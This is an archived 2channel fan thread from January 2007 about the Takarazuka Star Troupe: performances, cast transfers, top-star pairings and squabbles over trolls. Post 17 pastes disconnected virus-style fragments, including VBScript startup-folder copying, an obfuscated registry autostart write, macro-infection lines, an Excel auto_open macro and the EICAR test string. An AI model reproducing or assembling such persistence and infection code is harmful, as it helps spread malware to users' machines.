2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★★★星組スレッド見参!★★★Part41

1 :名無しさん@花束いっぱい。:2007/01/08(月) 00:51:23 ID:c/SZAzSq
星組に関するスレです。
荒し、煽り、厨は華麗にスルーして和やかに楽しくまいりましょう。
基本的にはsage推奨。

おやくそく

1. 星組生への愛を叫べ(ただし喚かない、節度を保つ)

2. 愛のないレスはスルー(安置・青林・痛杉etc.自力あぼーん推奨)

3. 愛があっても不毛な争いは禁止(他人は他人、自分は自分)

4. 初心者は半年ROMれ(っていうか空気読めるまで)

5. 新スレは980踏んだ人が立てる(ダメなら次の人にパス)

6. 「○○ファンうざい」「出て行け」などは基本的に煽り認定 オメデトー
  煽りに反論、同意、いずれも煽り一派とみなされます

7. どんな場合も、スルー&あぼーん出来ない輩は厨ケテーイ

2 :名無しさん@花束いっぱい。:2007/01/08(月) 00:53:54 ID:c/SZAzSq
前スレ
★★★星組スレッド見参!★★★Part40
http://hobby8.2ch.net/test/read.cgi/siki/1166355144

3 :名無しさん@花束いっぱい。:2007/01/08(月) 03:04:39 ID:v1yfJtSm
>1-2タソ
乙です。
嫁入りを祝して(ホントは寂しい)ピーナッツ、金平糖、梅ジャム付きお団子ドゾー。
つ−●▽●∞☆梅∨梅−

深夜だし消化に悪そうかなw

4 :1:2007/01/08(月) 07:56:58 ID:c/SZAzSq
ゴチ★

しかし寂しすぎるぜ…

5 :名無しさん@花束いっぱい。:2007/01/08(月) 11:45:36 ID:aGfHukAh
ちえうめ最高!
ハレルヤもっと通いたい!
私が見たい星組がそこにあった!
なんでうめが出て行かなきゃなんないの?
ん〜。全ては奴のせい。
ハローダンシングもたのしみ。
あかし〜待ってるよ〜。

6 :名無しさん@花束いっぱい。:2007/01/08(月) 11:59:37 ID:2PoXmJVI
人のせいにするのは筋違いでは?
文句あるんだったら、歌劇団に言ったらいいじゃない。
昔から、新公などでよく組んでいるコンビが、本公演でもコンビを組むっていうことはないもの。
ウメは栄転だから寂しいけど、笑って送り出すしかしかない。

7 :名無しさん@花束いっぱい。:2007/01/08(月) 12:04:09 ID:aGfHukAh
異動の話が来た時にとなみに電話して相談したうめ。
同じトップになるなら、
順当にとなみから引き継ぎたかっただろうなぁ。

8 :名無しさん@花束いっぱい。:2007/01/08(月) 12:21:06 ID:m4huq+GY
煽りに乗るなといっても聞けないんだったね。
とうこちゃんに母性本能かきたてられたとうこファンは
反応が母親になっちゃうんだろうな。
なんだかわかんない水兵ディアボロは
母性に訴えるには必要な場面だったわけだ。
オギーって天才だな。

9 :名無しさん@花束いっぱい。:2007/01/08(月) 12:25:52 ID:a4g+Hszh
ヘイズ東京初日、トウコさん、「私達コンビをよろしくお願いします!」って叫んだらしいね。
またかよ…。そればっか。

10 :名無しさん@花束いっぱい。:2007/01/08(月) 12:35:55 ID:7j6rrc3z
既出ですね。

とうこさんCSで全国に向けて
「星組をよろしくお願いします。」とおっしゃってますよ。
だから、とうこファンも星組をかわいがってくれるでしょう。
きっとね。

11 :名無しさん@花束いっぱい。:2007/01/08(月) 12:38:55 ID:r1VF3Aew
とうこはどうせ超短期なんだからさ、すぐにわたるを受け継ぐちえの
時代がやってくるんだぜ。暗黒星組はあっという間に終わる。
黄金の☆復活まで寝て待とう。

12 :名無しさん@花束いっぱい。:2007/01/08(月) 12:49:48 ID:a4g+Hszh
>>10
そうかなぁ〜?
トウコさんが新コンビのアピールばかりするから、
ファンもとうあすマンセーばかりしてるのかと思った。
奇跡とか、ホント恥ずかしいよ。

13 :名無しさん@花束いっぱい。:2007/01/08(月) 13:22:04 ID:CuwQgs/B
煽りに乗るのがお上手で、、、

14 :名無しさん@花束いっぱい。:2007/01/08(月) 13:36:04 ID:v1yfJtSm
ッタク・・・。980間際になるとピターとレスが止まってるのに、
新スレできた途端、お礼の言葉も無く煽りに叩きばかりとは情けない。
他組ファンに恥ずかしいからageないでね>13

15 :名無しさん@花束いっぱい。:2007/01/08(月) 13:52:38 ID:Eb8h52q8
>9
伝聞でなく客席で直接聞いたら感想も違ったかもね
組替でほぼ落下傘の娘1をよろしくの気遣いを感じたよ、私は…。
伝聞だけでなく、CSニュースの星組よろしく映像も見たら?
各回48分から始まるから。


16 :名無しさん@花束いっぱい。:2007/01/08(月) 15:45:12 ID:nAwimxil
青年館にみらんちゃんがきたよー!
ラストの客席下りでしぃちゃんが両手握って引っ張ってた。

17 :名無しさん@花束いっぱい。:2007/01/08(月) 18:52:50 ID:pwxozNCH
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


18 :名無しさん@花束いっぱい。:2007/01/08(月) 22:03:21 ID:r1tOPcLm
ことこと見事にフラれ役なのね。
肩たたきなのかな・・・。


19 :名無しさん@花束いっぱい。:2007/01/08(月) 22:33:49 ID:FB0xtqGQ
>18
どうしてそういう風に解釈するんだろう?
ラル様とハッピーエンドなのに…。

20 :名無しさん@花束いっぱい。:2007/01/08(月) 22:35:13 ID:CUismmeR
ことこと良かったじゃないかー! 
本人も楽しそうな感じで見てるこっちも楽しかった。

21 :名無しさん@花束いっぱい。:2007/01/08(月) 22:37:14 ID:sPr7Sf65
「ネオ・ダン」のパンパミーアや「ロマンチカ」の青の洞窟で、
トップのワタルさんと2番手娘役のウメちゃんが組んだみたいに、
トップのトウコちゃんが相手役のあすかちゃん以外に組むとしたら
体格的にコトコトが重宝されると思う。
2番手娘役としては、まりもちゃんが出てくると思うけど、トウコちゃんには
大きすぎる。とうあすは、長期ってわけじゃないだろうから、トップコンビ同士の
場面をたくさん見たいとは思うけど、コトコトには別格として頑張ってほしい。
ふられ役だから肩たたきってことはないと思うけど・・・。

22 :名無しさん@花束いっぱい。:2007/01/08(月) 22:56:43 ID:wQbtQElK
ウメみたいに確固たる2番手娘役ポジがいなくなる分
コトコト、みなみは確実に芝居での仕事量は増えると思うし、そう願う。
その方がせあら以下の新公組の勉強にもなる。

問題は組子を上手く動かせる演出家が…(以下略)



23 :名無しさん@花束いっぱい。:2007/01/08(月) 23:16:38 ID:CUismmeR
娘役の出番、というか役が増えそうで嬉しいな。

24 :名無しさん@花束いっぱい。:2007/01/08(月) 23:47:49 ID:aJjqkmNt
組み替えで誰か娘来るだろうなー。
そうなると残念だけど扱い的には今までと大してかわらないよね。
とうあすは結構やりそうだが。
やっぱり独壇場か。

25 :名無しさん@花束いっぱい。:2007/01/08(月) 23:48:39 ID:aU7QQgxk
とうこちゃんがあすかをリフトはきついから
お披露目は日本物のショーなんだと思ってた。
黒塗りもリフトいらないし。
サザクロにトップコンビのリフトなかったよね。
ノバ・ボサもバロック千一夜も・・・。


26 :名無しさん@花束いっぱい。:2007/01/09(火) 00:16:23 ID:fUnB5ThD
今思えば、演目的にリフトがないのでなく、マミ・ダン、イシ・グン、ミキ・ほさち、
イチロ・ハナだから無かったような気がする。
サザクロは、何度か再演されてるから、たー・あき、ワタ・ダンの時に
リフトありの演出に変えればよかったと言われればそれまでだけど。

27 :名無しさん@花束いっぱい。:2007/01/09(火) 00:44:28 ID:KTobA6MR
>25
自分よりでかいねったんやウメちゃんをリフトしてたんだからやれるんじゃない?

28 :名無しさん@花束いっぱい。:2007/01/09(火) 01:02:31 ID:Rg0j4WvY
>9
亀レスですが
その台詞はとうこさんの主演者挨拶じゃなくて、
何度めかのカテコ、舞台上二人きりの場面でお辞儀しての一言挨拶だったです。
お披露目とゆーことでフツーにコンビ顔見せの「よろしく」だと思いまする。
あすか一人新入りですが、星組さんすごくホットにまとまってて、
あすかもとうこさんとのシーンだけでなく皆さんと溶け込んで演じてるのでホントうれしす(´;ω;`)
みなさま感謝です byあすかファン

29 :名無しさん@花束いっぱい。:2007/01/09(火) 08:12:25 ID:EMpF/ZWx
ショーが日本物ってことはショーが1幕で芝居が2幕ってパターンが多くなかったっけ?
月のシニョール ドン・ファンでは普通のフィナーレだった記憶がある

30 :名無しさん@花束いっぱい。:2007/01/09(火) 09:08:40 ID:PQZilPCc
ヘイズ・コードで初めて星組を観劇しました。
昨年春の宙組「Never Say 〜」、花組「ファントム」に続き3度目です。

お話は気張らずに見られるコメディで新年初観劇作品としてはとても良かったです。
コメディだったからかもしれませんが、星組さんって面白い人多いですか?(笑)
宙組、花組とは全然違った雰囲気で楽しかったです。とても星組を気に入りました!

安蘭けいさんお上手なんだけど、トップスターって感じはあまりしませんでした。
出てきただけで華やかで、この人がトップさん!って誰の目から見ても分かる
分かり易いオーラがあるものだと思っていたので…。
和央さん、春野さんはそういうタイプのトップさんだなぁと思ったんですが。
色んなトップさんが居るんですね。
ただ、これぞ宝塚ってものを期待していたので少し肩透かし…。
宝塚劇場以外では羽を背負って降りてきてくれないのかな?
それでそう感じてしまったのかもしれません。

次の東宝劇場公演のチケットも頂けるようなので、オーラが出た安蘭さんを楽しみにしています。

31 :名無しさん@花束いっぱい。:2007/01/09(火) 09:26:26 ID:YW4sg5ad
>30
感想ありがとうございます、宝塚を、星組を気にいっていただけて嬉しいです
これからも宝塚をよろしくお願いいたします
なによりも華やかなオーラを第一に求めて観劇されるときは、星でない組を
ご覧になったほうがよいかもしれませんね
来年か再来年には星組も華やかでオーラのある正統派星組男役がトップになりますが
それまでは今東宝でやっている宙組や、その次の春野さん花組、華やかな
ダンサートップの月組、ヅカ随一の華持ち新トップお披露目の宙組などいかがですか?
大作お披露目の雪組もいいと思います
チームワークの良いお芝居を見たいなというとき、是非また星組にお越しください



32 :名無しさん@花束いっぱい。:2007/01/09(火) 09:33:00 ID:GizMB8ZR
>30-31
自演?またこんなくだらない事を・・・。

33 :名無しさん@花束いっぱい。:2007/01/09(火) 09:43:56 ID:FbwJFEfT
>30さん
3度目の観劇、星公演楽しんでいただけて良かったです。
これからも星組公演を続けて観劇していただければ、
宝塚にはオーラや羽とは又ひと味違う感動があると言う事が
感性豊かなアナタなら分かっていただけると思います。
と、一応マジレス。


34 :名無しさん@花束いっぱい。:2007/01/09(火) 09:49:33 ID:GizMB8ZR
>33
オーラは有るよ。今回は事情もいつもとは違うけどね。

35 :名無しさん@花束いっぱい。:2007/01/09(火) 10:27:07 ID:PQZilPCc
私の固定観念だったのだと思います。
宝塚はまず何より華やかで現実離れした世界で
そこに出て来る俳優さん達も現実離れした容姿で…。
技術を見たいなら他所の作品を見れば良いかな…みたいな。
あ。誤解して欲しくないのですが、私は決して宝塚を下に見ているわけではありません。
他では見られない宝塚にしかないものをきっと期待し過ぎていたのだと思います。
色んな組があるのですね。そして見る方はその時々で見たい組を選べば良いのだと。
星組の良さが突出したトップさん個人の魅力というより、ものすごいチームワークだというのは
一度見ただけで本当によく分かりました。
あと、俳優さんお一人お一人とても個性的。
さっきも書きましたが、星組さんのそういう所、好きになりました。

>>34さん
今回の事情というのは、どういう所なのか可能でしたら教えていただけますか?

36 :名無しさん@花束いっぱい。:2007/01/09(火) 10:49:04 ID:7SdFHYXe
>>35
宝塚らしいものを見たいなら大劇場作品を観るべし。だな。

今やってる月組さんはある意味宝塚らしい鴨知れないよ。
植田だし。

37 :名無しさん@花束いっぱい。:2007/01/09(火) 11:17:49 ID:v2iYgf0V
>35さん
和央さん、春野さんはオーラというかお2人のトップ歴・作品数による
トップの風格ではないでしょうか。
安蘭さんはこの春大劇デビュー、星組公演楽しみにしてください。




38 :名無しさん@花束いっぱい。:2007/01/09(火) 11:25:34 ID:GizMB8ZR
>35さんがアンチじゃないと信用して(疑ってゴメン)反応します。
事情というのは、今回の公演はトウコさんが声帯を痛めていたので、
台詞歌共に発声は抑え気味に、楽日までもたせる為にはあまり大熱演は
(そういうキャラの役でもないが)無理なんです。
それと、見た目がわかり易く派手(羽根とか)=スターオーラではないと思いますが。
存在感というか、舞台空間を支配するような魅力の事を言うのでしょう?
そういう意味ではトウコさんにはオーラが有ると思います。
>36さんの言うように大劇場作品と中小劇場の作品は違うんです。
星組のチームワークは一番の自慢です。これからも見てみて下さい。
長文失礼しますた。

39 :名無しさん@花束いっぱい。:2007/01/09(火) 11:30:04 ID:8T+8bzrV
>30の人は宝塚ファンの友達に誘われて見たのかな?
ネバー、ファントム、ヘイズという演目は
「これぐらいなら宝塚初心者でも抵抗なく誘えるかな?」って感じの
宝塚っぽさライト級の作品かも。友達の気遣いが感じられまつ。w

でも意外に初心者は、大きな羽とかキラキラして派手なロケットとか
コテコテの宝塚っぽさを期待してるんだよね。実を言えば私もそうだった。www
今なら>36のすすめる月組公演がいいと思う。
次の星組の大劇場公演はショーが日本物だしレビューっぽさは少ないから。


40 :名無しさん@花束いっぱい。:2007/01/09(火) 11:46:15 ID:9ebDJoVf
虎・・・。

41 :名無しさん@花束いっぱい。:2007/01/09(火) 12:55:00 ID:xZC6j0i6
今日のスカステレポート、
レオンウメしみこの並び、いいねえ・・
バウ、観てないから画面だけだけど若さと希望でキラキラしてる。
ウメの組替え残念だけど、レオンしみこの並びは期待できる!


42 :名無しさん@花束いっぱい。:2007/01/09(火) 13:17:39 ID:/cy2PRzv
理事長が動かない限り
生え抜きトップはないんじゃないの。
うんた、タニ、蘭とむ、みちこまで動かしてるのに?

43 :名無しさん@花束いっぱい。:2007/01/09(火) 13:20:33 ID:/cy2PRzv
ちえ星トップに反対しているわけじゃない。
心の準備をしているだけだから。

44 :名無しさん@花束いっぱい。:2007/01/09(火) 16:12:23 ID:O2VoKJgJ
ちえとしみこの並びに娘役は誰が入るのかねw

やっぱりまりもちゃんかな?

45 :名無しさん@花束いっぱい。:2007/01/09(火) 23:03:40 ID:a97AgUUO
黒塗りだからリフトがないという発想がよくわからん。
パパラギではリフトあったじゃん。絢爛もあったよな。
もっとさかのぼれば結構あると思うけど。

それよか別にリフトなんか必要ないと思うけどね。
ヅカだと誰がやっても重たそうに見える。
やっぱりリアル男の力はすごいよね。とこだわりアラカルト見て思った。

それはそうと、とうこってでかい娘役が似合うと思った。
そんちゃんとかかのちか(こちらは幅がw)。
包容力のあるタイプが似合うのかな。やっぱり守りたい系キャラ?

46 :名無しさん@花束いっぱい。:2007/01/09(火) 23:13:36 ID:iREUic9u
まりもちゃんって言うの、あの子。
バウ観たけど、地味だった。

47 :名無しさん@花束いっぱい。:2007/01/09(火) 23:57:14 ID:YNu3OAG2
30さんはバウを見てくれたら納得してくれたかもね。
羽がないからオーラを感じなかったわけではないでそ。
ちえは更に華やオーラや貫禄が増してた。
でもすぐにトップになって欲しくはないんだよなぁ。
トップ=退団へのカウントダウンだもん。
100周年の運動会はちえトップで見たいぞ。

48 :名無しさん@花束いっぱい。:2007/01/10(水) 00:01:53 ID:9KhFp/XI
ミルデイとラル様〜〜 は、その後どうなったのでしょうか。
なが〜いキスで愛を確かめあった2人、その日の夜はどう過ごしたのでしょうか。
若くて可愛いバーテンダーを無理矢理部下にしてしまった柚美ネエサンの真の目的は?

気になるッ!

49 :名無しさん@花束いっぱい。:2007/01/10(水) 00:27:28 ID:yaYJCaUg
どーせ初心者のフリした巧妙なアンチでしょ。>30=35
初心者がわざわざ下位にある組スレ探して、さりげなーく嫌味カキコなんかする?
自分で結論導きだしちゃってて、答えてあげた人には反応無しじゃない。

50 :名無しさん@花束いっぱい。:2007/01/10(水) 00:37:00 ID:ZvaJJDqt
何でもアンチの仕業にするのもどうかと思うよ。


51 :名無しさん@花束いっぱい。:2007/01/10(水) 00:49:44 ID:yaYJCaUg
だからさ。そーゆー流れにするのもお決まりのパターンでしょ。>50
もうわざわざ叩きたいが為に話題になんてしないでいいから。
ずっとちえちゃんなり過去のトップさんなりを誉め讃えていればいいから。

52 :名無しさん@花束いっぱい。:2007/01/10(水) 01:26:24 ID:fmctR1tM
うわ・・・すっごい被害妄想炸裂・・・
初心者さんの意見、別にそういう意見があっても有りじゃない?

長年自分がそうやって自演して他生徒叩いてきたから疑心暗鬼になっちゃってるの?

53 :名無しさん@花束いっぱい。:2007/01/10(水) 01:28:58 ID:dr08HySV
ID:yaYJCaUg
もう終わった話を掘り起こして、必死にアンチだ叩きだってレスするのやめてくれない?


54 :名無しさん@花束いっぱい。:2007/01/10(水) 01:49:39 ID:IO6h7tl7
>7
相談ねー。組がえって相談してどうこうなることでもなかろうに。

55 :名無しさん@花束いっぱい。:2007/01/10(水) 06:37:29 ID:yaYJCaUg
>52
ハァ?最後の行、すっごい決め付け。
いつもそうやって叩きの上に、変な言い掛かりまでつけられちゃ、疑心暗鬼にもなるわ。
>53
蒸し返したのは>47

56 :名無しさん@花束いっぱい。:2007/01/10(水) 08:44:32 ID:8wtk0f0+
今回の公演、ほんとうに良かったです!
ワタルファンだったんで、今までみたいなときめきはなかったですが
星の良さがすごく出ていました。
トウコさん、歌もいいけれど お芝居も本当にいいですねー!
星組皆が大風邪をひいて舞台裏は大変だったみたいですけど
年明けから本当にいい舞台を見させてもらいました。

57 :名無しさん@花束いっぱい。:2007/01/10(水) 09:47:45 ID:PTH9rM2d

ワタルファンになりすましたトウコファン

58 :名無しさん@花束いっぱい。:2007/01/10(水) 10:07:18 ID:UKNX7luP
大劇場千秋楽の出を知らないな。
まあ、いい。
ネオ・ダンには片手リフトがある。
あすか、ガンガレ!

59 :名無しさん@花束いっぱい。:2007/01/10(水) 10:28:25 ID:eF7gXJv1
>58
ネオダンUには片手リフトは無いと思う。
あれはわたる仕様だし。

60 :名無しさん@花束いっぱい。:2007/01/10(水) 10:29:40 ID:tsL9W6zz
大劇場千秋楽の出ってなに?

61 :名無しさん@花束いっぱい。:2007/01/10(水) 10:40:51 ID:AQ9DgXHz
ネオダンはまったくかわるんじゃないの?
ポラリスはまずやらないだろ。
プロローグも変わりそう。あの雰囲気はワタルさん向き。
トウコさん仕様に変りそう。

62 :名無しさん@花束いっぱい。:2007/01/10(水) 10:47:23 ID:QyVewG3y
全体がわたるが踊ってトウコが歌う(トウコも頑張って踊ってたけどさ)
仕様になってたから、どう変えるのかねえ。

63 :   あ、あげるおっ:2007/01/10(水) 11:44:36 ID:zxoqFGav
チエが踊ってトウコが歌う仕様じゃね?
それなら大幅に変更せずに済む。

64 :名無しさん@花束いっぱい。:2007/01/10(水) 11:53:22 ID:IVceuoW9
ちえは日生かと。

65 :名無しさん@花束いっぱい。:2007/01/10(水) 12:01:48 ID:CMBGq0PI
今回ちえバウ東上しないから日生っぽいね。
そのまえに2番手だから、とう子とは別組か
日生は近くだから沢山観るけどネオダンも大好きだったから沢山みたい・・また2箇所か・・

66 :名無しさん@花束いっぱい。:2007/01/10(水) 12:50:21 ID:Oevotqqa
ネオ・ダン、大好きだったよ。
とうこ仕様はまた楽しみ。
とにかくまたあのショーが観られるのが嬉しい。
博多座遠征します。博多の皆さんよろしくね〜。

67 :名無しさん@花束いっぱい。:2007/01/10(水) 14:53:32 ID:uU45gx4U
ダンディズムとは何でしょう
はもういいよねw

68 :名無しさん@花束いっぱい。:2007/01/10(水) 17:06:01 ID:a4JFiTnN
今日二時公演に来ていたジェンヌさんはどなたでしょうか?

69 :名無しさん@花束いっぱい。:2007/01/10(水) 18:44:53 ID:G5Cz8o/J
ともちん、うきょーさん、はつねさんだと思います

70 :名無しさん@花束いっぱい。:2007/01/10(水) 21:29:08 ID:rXvvaOIl
>67
同意。
今の宙でも思ったが、ショーで台詞はやめてほしい。
あれ、絶対流れを壊すと思う。流行なのか?

71 :名無しさん@花束いっぱい。:2007/01/10(水) 22:25:07 ID:ENdbP1u6
夏の博多座って例年どこの組も2番手同行してるように思うけど。
てことはちえちゃんが行くんじゃないの?

72 :名無しさん@花束いっぱい。:2007/01/10(水) 22:48:51 ID:PTH9rM2d
この前トドさんとトークショーやったし
レオンは日生確定でしょうね。
博多座は例年2番手出演ということは
ゆうひさん星異動で博多座出演が濃厚ですね。

73 :名無しさん@花束いっぱい。:2007/01/10(水) 23:06:55 ID:Oevotqqa
普通に考えて、ちえは日生だよ。
でもゆうひが異動って、まだそんなことを・・・。

74 :名無しさん@花束いっぱい。:2007/01/10(水) 23:08:04 ID:8F+/xxz3
日生は歌えないとヤバイらしいのでレオンだよ

75 :名無しさん@花束いっぱい。:2007/01/10(水) 23:08:47 ID:HHjvRHHW
>72
「ヘイズコ-ド」観てませんね?
ゆうひさんの入り込む隙間蟻の穴ほどもありません。

76 :名無しさん@花束いっぱい。:2007/01/10(水) 23:10:17 ID:OWHtIO2C
白竜・紫竜・青ランもなく
パンパもポラリスもデュエダンもないネオダン2・・・。


77 :名無しさん@花束いっぱい。:2007/01/10(水) 23:11:03 ID:RhT0T7yg
流れ豚切りでスマソ。

バウのプレシャス修正されたね。
問い合わせしてくれた人dクス!

78 :名無しさん@花束いっぱい。:2007/01/10(水) 23:17:22 ID:etExfj1r
>70
私もショーでの台詞って好きじゃない。
とたんにショーが安っぽくなる。
言いたいことを歌やダンスで表す力がほしいものだ、演出家に。

79 :名無しさん@花束いっぱい。:2007/01/11(木) 00:58:36 ID:yKAEL0Rc
主題歌が♪ダンディ〜美し〜く♪のままだとしたら
あの横揺れお耽美場面が残るのかな…

80 :名無しさん@花束いっぱい。:2007/01/11(木) 01:30:57 ID:p2LIsJp5
カット確実はポラリスだろうな。
真矢みき版のを使いそう。真矢版は主役は歌中心だった気がする。
疵もバージョンが違うし。キャリオカが残るかな?
海賊みたいなみきさんにメイン男役のダルマ勢ぞろいのシーンとか
あったけれど。

81 :名無しさん@花束いっぱい。:2007/01/11(木) 01:51:56 ID:45EVXLY1
ヘイズ観てきました。
九日の夜の部は最高でした!
なんとコムさん、成瀬さんがいらしてて盛り上がりがすごかったです。
ことちゃん、とよこちゃんと上げると切りがないのですが、笑いどころがたくさんありましたし、一人一人が本当にいいキャラでした!
最下級生があんなに踊れるなんて!びっくりしちゃいました。
しゅん君も、いい味だしてましたよ!
トウアスコンビもまだ見慣れませんが、出演者全員の、あの楽しそうな表情をみたら、あ〜いい組!一緒に盛り上がるぞ〜!なんて気分に。
千秋楽はかなり盛り上がりそうです!
結構九日夜、十日とOG、現役さんがいらして、なんかほっこりしましたよ。
長文失礼しました!

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)